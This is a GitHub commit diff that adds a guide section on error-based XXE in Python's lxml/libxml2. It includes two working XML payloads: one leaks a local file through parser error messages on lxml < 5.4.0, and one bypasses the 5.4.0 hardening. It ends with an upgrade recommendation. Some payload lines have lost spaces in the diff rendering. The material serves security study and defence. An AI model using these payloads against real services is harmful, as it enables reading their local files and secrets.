You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
> The Python library **lxml** uses **libxml2** under the hood. Versions prior to **lxml 5.4.0 / libxml2 2.13.8** still expand *parameter* entities even when `resolve_entities=False`, making them reachable when the application enables `load_dtd=True` and/or `resolve_entities=True`. This allows Error-Based XXE payloads that embed the contents of local files into the parser error message.
785
+
786
+
#### 1. Exploiting lxml < 5.4.0
787
+
1. Identify or create a *local* DTD on disk that defines an **undefined** parameter entity (e.g. `%config_hex;`).
788
+
2. Craft an internal DTD that:
789
+
* Loads the local DTD with `<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">`.
790
+
* Redefines the undefined entity so that it:
791
+
- Reads the target file (`<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">`).
792
+
- Builds another parameter entity that refers to an **invalid path** containing the `%flag;` value and triggers a parser error (`<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">`).
793
+
3. Finally expand `%local_dtd;` and `%eval;` so that the parser encounters `%error;`, fails to open `/aaa/<FLAG>` and leaks the flag inside the thrown exception – which is often returned to the user by the application.
794
+
795
+
```xml
796
+
<!DOCTYPEcolors [
797
+
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
798
+
<!ENTITY % config_hex'
799
+
<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">
800
+
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">
801
+
%eval;'>
802
+
%local_dtd;
803
+
]>
804
+
```
805
+
When the application prints the exception the response contains:
806
+
```
807
+
Error : failed to load external entity "file:///aaa/FLAG{secret}"
808
+
```
809
+
810
+
> [!TIP]
811
+
> If the parser complains about `%`/`&` characters inside the internal subset, double-encode them (`&#x25;` ⇒ `%`) to delay expansion.
812
+
813
+
#### 2. Bypassing the lxml 5.4.0 hardening (libxml2 still vulnerable)
814
+
`lxml` ≥ 5.4.0 forbids *error* parameter entities like the one above, but **libxml2** still allows them to be embedded in a *general* entity. The trick is to:
815
+
1. Read the file into a parameter entity `%file`.
816
+
2. Declare another parameter entity that builds a **general** entity `c` whose SYSTEM identifier uses a *non-existent protocol* such as `meow://%file;`.
817
+
3. Place `&c;` in the XML body. When the parser tries to dereference `meow://…` it fails and reflects the full URI – including the file contents – in the error message.
818
+
819
+
```xml
820
+
<!DOCTYPEcolors [
821
+
<!ENTITY % a'
822
+
<!ENTITY % file SYSTEM "file:///tmp/flag.txt">
823
+
<!ENTITY % b "<!ENTITY c SYSTEM 'meow://%file;'>">
824
+
'>
825
+
%a;%b;
826
+
]>
827
+
<colors>&c;</colors>
828
+
```
829
+
830
+
#### Key takeaways
831
+
***Parameter entities** are still expanded by libxml2 even when `resolve_entities` should block XXE.
832
+
* An **invalid URI** or **non-existent file** is enough to concatenate controlled data into the thrown exception.
833
+
* The technique works **without outbound connectivity**, making it ideal for strictly egress-filtered environments.
834
+
835
+
#### Mitigation guidance
836
+
* Upgrade to **lxml ≥ 5.4.0** and ensure the underlying **libxml2** is **≥ 2.13.8**.
0 commit comments